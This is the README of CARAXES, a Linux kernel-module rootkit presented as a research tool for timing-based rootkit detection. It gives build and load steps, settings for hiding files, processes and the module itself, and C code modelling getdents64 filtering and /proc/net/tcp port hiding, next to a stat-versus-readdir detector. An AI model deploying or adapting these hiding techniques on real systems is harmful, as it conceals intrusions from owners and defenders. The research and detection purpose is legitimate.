This repository contains the Linux kernel module (LKM) rootkit CARAXES, which stands for Cyber Analytics Rootkit for Automated and eXploratory Evaluation Scenarios. The rootkit can be used to hide files, directories, and processes. In addition, we use the rootkit to evaluate anomaly detection approaches based on kernel function timings - check out this repository for details. The rootkit is designed for Linux kernel 6 and above and was tested on kernel versions 5.15 through 6.11.
Important Disclaimer: Caraxes is purely for educational and academic purposes. The software is provided "as is" and the authors are not responsible for any damage or mishaps that may occur during its use. Do not attempt to use Caraxes to violate the law. Misuse of the provided software and information may result in criminal charges.
If you use any of the resources provided in this repository, please cite the following publication:
- Landauer, M., Alton, L., Lindorfer, M., Skopik, F., Wurzenberger, M., & Hotwagner, W. (2025). Trace of the Times: Rootkit Detection through Temporal Anomalies in Kernel Activity. Under Review.
First, install the following dependencies. Make sure to install the header files matching your running kernel: `linux-headers-$(uname -r)` should work on Debian-like systems (see the commands below). On Arch-like systems try `pacman -S linux-headers` or `pacman -S linux-zen-headers` instead.
```
ubuntu@ubuntu:~$ sudo apt update
ubuntu@ubuntu:~$ sudo apt install python3-bpfcc make gcc flex bison linux-headers-$(uname -r)
```
Second, download and compile the rootkit from this repository.
```
ubuntu@ubuntu:~$ git clone https://github.com/ait-aecid/caraxes.git
ubuntu@ubuntu:~$ cd caraxes/
ubuntu@ubuntu:~/caraxes$ sudo make
```
To test the rootkit, run `ls` in the directory - you should see several files as depicted below. Run `sudo insmod caraxes.ko` to load the rootkit into the kernel. Now run `ls` again - all files whose names contain the magic word "caraxes" are hidden from the user. To make the files visible again, just remove the rootkit from the kernel using `sudo rmmod caraxes`.
```
ubuntu@ubuntu:~/caraxes$ ls
LICENSE         README.md     caraxes.mod    caraxes.o        hooks.h             modules.order
Makefile        caraxes.c     caraxes.mod.c  caraxes_logo.svg hooks_filldir.h     rootkit.h
Module.symvers  caraxes.ko    caraxes.mod.o  ftrace_helper.h  hooks_getdents64.h  stdlib.h
ubuntu@ubuntu:~/caraxes$ sudo insmod caraxes.ko
ubuntu@ubuntu:~/caraxes$ ls
LICENSE   Module.symvers  ftrace_helper.h  hooks_filldir.h     modules.order  stdlib.h
Makefile  README.md       hooks.h          hooks_getdents64.h  rootkit.h
ubuntu@ubuntu:~/caraxes$ sudo rmmod caraxes
ubuntu@ubuntu:~/caraxes$ ls
LICENSE         README.md     caraxes.mod    caraxes.o        hooks.h             modules.order
Makefile        caraxes.c     caraxes.mod.c  caraxes_logo.svg hooks_filldir.h     rootkit.h
Module.symvers  caraxes.ko    caraxes.mod.o  ftrace_helper.h  hooks_getdents64.h  stdlib.h
ubuntu@ubuntu:~/caraxes$ make clean
```
The magic word that determines whether a file is hidden by the rootkit or not is defined in the variable `MAGIC_WORD` in the file `rootkit.h`; by default, the magic word is "caraxes". This file also allows you to set the variables `USER_HIDE` and `GROUP_HIDE`, which can be used to hide files or processes that belong to the specified user or group. By default, files and processes of user 1001 and group 21 (fax) are hidden.
Optionally, uncomment the call to `hide_module()` in `caraxes.c` to unlink the module from the kernel's module list, so that it no longer appears in `lsmod` or `/proc/modules`. Note that the name of the module you load (`caraxes.ko`) has to contain the magic word (it does by default): unlinking does not remove the module's sysfs directory, so without the magic word it would still show up under `/sys/module`.
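The hiding described above works at the directory-listing level, which gives a simple practitioner check: a path that is filtered out of a listing can still be reached by direct lookup, so `stat()` on the exact name succeeds while `readdir()` on the parent never returns it. The following program is an added example and not part of CARAXES; it assumes that only directory enumeration (`getdents64` or `filldir`) is hooked, as the README describes, and that nothing intercepts path lookup. `/sys/module/caraxes` is the default probe point; the self-test creates a temporary file carrying the magic word.

```c
/* Added example (not CARAXES code): tell a path that is merely absent
 * from a directory listing apart from one that does not exist.  A
 * getdents64/filldir hook filters enumeration only, so a direct lookup
 * with stat() on the exact name still succeeds for a hidden entry. */
#define _GNU_SOURCE
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum { PATH_UNKNOWN = -2, PATH_ABSENT = -1, PATH_VISIBLE = 0, PATH_HIDDEN = 1 };

/* Returns PATH_HIDDEN when stat(path) works but the final component is
 * not returned by readdir() on the parent directory. */
static int listing_hides(const char *path)
{
    struct stat st;
    char parent[4096];
    const char *name;
    const char *slash = strrchr(path, '/');

    if (stat(path, &st) != 0)
        return PATH_ABSENT;                 /* not present at all */
    if (strlen(path) >= sizeof parent)
        return PATH_UNKNOWN;

    if (slash == NULL) {
        strcpy(parent, ".");
        name = path;
    } else {
        size_t plen = (size_t)(slash - path);
        if (plen == 0)
            plen = 1;                       /* "/name": parent is the root */
        memcpy(parent, path, plen);
        parent[plen] = '\0';
        name = slash + 1;
    }
    if (*name == '\0')
        return PATH_UNKNOWN;                /* trailing slash: nothing to compare */

    DIR *dir = opendir(parent);
    if (dir == NULL)
        return PATH_UNKNOWN;
    int found = 0;
    struct dirent *e;
    while ((e = readdir(dir)) != NULL) {
        if (strcmp(e->d_name, name) == 0) {
            found = 1;
            break;
        }
    }
    closedir(dir);
    return found ? PATH_VISIBLE : PATH_HIDDEN;
}

/* Self-check: a temporary file whose name carries the magic word must be
 * visible on a clean host; with the rootkit loaded the same call would
 * return PATH_HIDDEN. */
static int selftest_tmpfile(void)
{
    char tmpl[] = "/tmp/caraxes_probe_XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return PATH_UNKNOWN;
    close(fd);
    int verdict = listing_hides(tmpl);
    unlink(tmpl);
    return verdict;
}

int main(int argc, char **argv)
{
    static const char *const names[] = { "unknown", "absent", "visible", "HIDDEN" };
    const char *defaults[] = { "/sys/module/caraxes" };
    const char **paths = argc > 1 ? (const char **)argv + 1 : defaults;
    int count = argc > 1 ? argc - 1 : 1;

    for (int i = 0; i < count; i++)
        printf("%-40s %s\n", paths[i], names[listing_hides(paths[i]) + 2]);
    printf("%-40s %s\n", "self-test (temp file with magic word)", names[selftest_tmpfile() + 2]);
    return 0;
}
```

Run it with no arguments to probe the module's sysfs directory, or pass any paths you suspect (a hidden file in the repository directory, a `/proc/<pid>` directory of a hidden process). A `HIDDEN` verdict for a path the listing does not show is the signature of enumeration-only hiding; a rootkit that also hooks lookup would defeat this check.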
Another option is to switch from `getdents` hooking to `filldir` hooking by commenting and uncommenting the respective lines in `hooks.h`.
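Both hooking variants end up removing directory entries whose name contains `MAGIC_WORD`; the `getdents64` variant does it on the buffer the real syscall has already filled, the `filldir` variant by wrapping the `dir_context` actor so that matching names are never emitted. The program below is an added example of the first approach and is not the project's code: it models the record compaction in userspace with a local copy of the `linux_dirent64` layout, a constructed listing of the repository directory, and the default magic word. In the kernel the same function would run on a `kmalloc`'d copy taken with `copy_from_user`, be written back with `copy_to_user`, and its return value would replace the syscall's.

```c
/* Added example, not CARAXES code: a userspace model of the name filtering
 * a getdents64 hook performs on the buffer the real syscall filled.  The
 * struct is a local copy of the kernel's linux_dirent64 layout so that the
 * logic can be built and run without a kernel. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAGIC_WORD "caraxes"                /* same default as rootkit.h */

struct linux_dirent64 {
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;
    uint8_t  d_type;
    char     d_name[];
};

/* Cut every record whose d_name contains `magic` out of the buffer and
 * return the new byte length, which is what the hooked syscall hands back
 * to the caller. */
static size_t filter_dirents(char *buf, size_t len, const char *magic)
{
    size_t off = 0;
    while (off < len) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
        size_t reclen = d->d_reclen;
        if (reclen == 0 || off + reclen > len)
            break;                          /* malformed: stop, never overrun */
        if (strstr(d->d_name, magic) != NULL) {
            memmove(buf + off, buf + off + reclen, len - off - reclen);
            len -= reclen;
            continue;                       /* re-check the record now at off */
        }
        off += reclen;
    }
    return len;
}

/* Build one record the way the kernel does: reclen rounded up to 8 bytes. */
static size_t append_dirent(char *buf, size_t off, uint64_t ino, const char *name)
{
    size_t namelen = strlen(name) + 1;
    size_t reclen = (offsetof(struct linux_dirent64, d_name) + namelen + 7) & ~(size_t)7;
    struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
    memset(d, 0, reclen);
    d->d_ino = ino;
    d->d_off = (int64_t)(off + reclen);
    d->d_reclen = (uint16_t)reclen;
    d->d_type = 8;                          /* DT_REG */
    memcpy(d->d_name, name, namelen);
    return off + reclen;
}

static size_t count_dirents(const char *buf, size_t len)
{
    size_t off = 0, n = 0;
    while (off < len) {
        const struct linux_dirent64 *d = (const struct linux_dirent64 *)(buf + off);
        if (d->d_reclen == 0)
            break;
        n++;
        off += d->d_reclen;
    }
    return n;
}

/* Constructed listing of the repository directory (five of its files). */
static size_t build_demo(char *buf)
{
    const char *names[] = { "LICENSE", "caraxes.ko", "Makefile", "caraxes.c", "rootkit.h" };
    size_t len = 0;
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        len = append_dirent(buf, len, 100 + i, names[i]);
    return len;
}

/* Number of records the filter removes from the demo listing (expected 2). */
static int demo_hidden_count(void)
{
    uint64_t storage[64];                   /* 8-byte aligned backing store */
    char *buf = (char *)storage;
    size_t len = build_demo(buf);
    size_t before = count_dirents(buf, len);
    len = filter_dirents(buf, len, MAGIC_WORD);
    return (int)(before - count_dirents(buf, len));
}

/* Surviving names joined by spaces (expected "LICENSE Makefile rootkit.h"). */
static const char *demo_filtered_listing(void)
{
    static char out[128];
    uint64_t storage[64];
    char *buf = (char *)storage;
    size_t len = filter_dirents(buf, build_demo(buf), MAGIC_WORD);
    size_t off = 0;

    out[0] = '\0';
    while (off < len) {
        const struct linux_dirent64 *d = (const struct linux_dirent64 *)(buf + off);
        if (out[0] != '\0')
            strncat(out, " ", sizeof out - strlen(out) - 1);
        strncat(out, d->d_name, sizeof out - strlen(out) - 1);
        off += d->d_reclen;
    }
    return out;
}

int main(void)
{
    printf("hidden %d record(s); remaining: %s\n", demo_hidden_count(), demo_filtered_listing());
    return 0;
}
```

The `continue` after the `memmove` matters: two adjacent matching records would otherwise leave the second one in place. The bound check on `reclen` is the part most hobby rootkits skip; a malformed `d_reclen` in a buffer you did not build yourself is a kernel oops waiting to happen.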
Keep in mind that if you unlink the module from the module list (by uncommenting `hide_module()`), `rmmod` will not find it and you will have to signal the rootkit somehow to unhide itself with `show_module()`. If you get into that situation and the unhide does not work, or the kernel module crashed on `rmmod` or similar, a system restart should always do the trick.
In case you run into problems when installing the kernel header packages, try to uninstall all headers and only install the ones for your kernel.

```
ubuntu@ubuntu:~/caraxes$ sudo apt remove linux-headers-*
ubuntu@ubuntu:~/caraxes$ sudo apt install linux-headers-$(uname -r)
```
If you want to extend the code, the easiest way to debug it is to uncomment the calls to `rk_info` and `printk` or add your own, then monitor `dmesg` on insert / remove with `sudo dmesg -w`.
Hiding open network ports is harder than hiding files, for the following reasons. `/proc/net/{tcp,udp}` list open ports in a single file instead of one entry per port, so this has to be addressed either by mangling the `read*` syscalls or by hooking `tcp4_seq_show()`, which fills the content of this file. Additionally, `/sys/class/net` shows network activity statistics, which could hint at an open port. Also, a `bind()` to a port that the hidden service already holds fails with `EADDRINUSE`, so the rootkit would have to flee, give up its port, and start using a different one.
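To make the `/proc/net/tcp` problem concrete, the program below is an added example (not CARAXES code) of the row filtering a hook on that file's read path, or a wrapper around `tcp4_seq_show()`, would have to apply to hide a single listening port. It parses the file's text format: each row carries a slot number, then the local and remote address as hex IPv4 plus hex port. The sample rows are constructed, not captured; the hidden listener on 8080 is given uid 1001 to match the default `USER_HIDE`.

```c
/* Added example, not CARAXES code: the line filtering a hook on the read
 * path of /proc/net/tcp (or a wrapper around tcp4_seq_show) would have to
 * apply to hide one listening port.  SAMPLE is constructed, not captured. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Three constructed rows: sshd on 22, a hidden listener on 8080 (0x1F90)
 * owned by uid 1001, and an established client connection to port 22. */
static const char SAMPLE[] =
"  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
"   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0\n"
"   1: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 23456 1 0000000000000000 100 0 0 10 0\n"
"   2: 0100007F:A3C2 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 34567 1 0000000000000000 20 4 30 10 -1\n";

/* Local port of one entry line, or -1 for the header / unparsable input.
 * Rows look like "   0: 0100007F:0016 ...": slot number, then the hex IPv4
 * address and the hex port in host byte order, so :0016 is port 22. */
static int local_port_of(const char *line)
{
    const char *p = line;
    char *end;
    unsigned addr, port;

    while (*p == ' ')
        p++;
    (void)strtol(p, &end, 10);
    if (end == p || *end != ':')
        return -1;                          /* header line or garbage */
    p = end + 1;
    while (*p == ' ')
        p++;
    if (sscanf(p, "%8x:%4x", &addr, &port) != 2)
        return -1;
    return (int)port;
}

/* Copy `in` to `out`, dropping rows whose local port is hide_port.
 * Returns the number of rows dropped, or -1 if out is too small. */
static int filter_proc_net_tcp(const char *in, char *out, size_t outsz, int hide_port)
{
    size_t used = 0;
    int dropped = 0;
    const char *line = in;

    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) + 1 : strlen(line);
        if (local_port_of(line) == hide_port) {
            dropped++;
        } else {
            if (used + len + 1 > outsz)
                return -1;
            memcpy(out + used, line, len);
            used += len;
        }
        line += len;
    }
    out[used] = '\0';
    return dropped;
}

static int count_lines(const char *s)
{
    int n = 0;
    for (; *s != '\0'; s++)
        if (*s == '\n')
            n++;
    return n;
}

static char g_filtered[1024];

/* Run the filter over SAMPLE; the filtered text is left in g_filtered. */
static int demo_hide_port(int port)
{
    return filter_proc_net_tcp(SAMPLE, g_filtered, sizeof g_filtered, port);
}

int main(void)
{
    int dropped = demo_hide_port(8080);
    printf("dropped %d row(s):\n%s", dropped, g_filtered);
    return 0;
}
```

Only the local port is matched, so the established connection to port 22 in slot 2 survives a request to hide port 22 while the listener in slot 0 disappears. Note the residue this leaves: the slot numbers in the filtered output jump from 0 to 2, and the hidden listener still answers on the wire, which is exactly the kind of inconsistency a detector can compare against the `/sys/class/net` counters and the `bind()` failures mentioned above.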
- sw1tchbl4d3/generic-linux-rootkit: forked from https://codeberg.org/sw1tchbl4d3/generic-linux-rootkit
- Diamorphine: `linux_dirent` element removal code from Diamorphine
- `ftrace_helper.h`: https://github.com/ilammy/ftrace-hook, edited to fit as a library instead of a standalone rootkit.
- https://xcellerator.github.io/posts/linux_rootkits_01/: got me into rootkits and helped me gain most of the knowledge to make this. Much of the code is inspired by the code found here.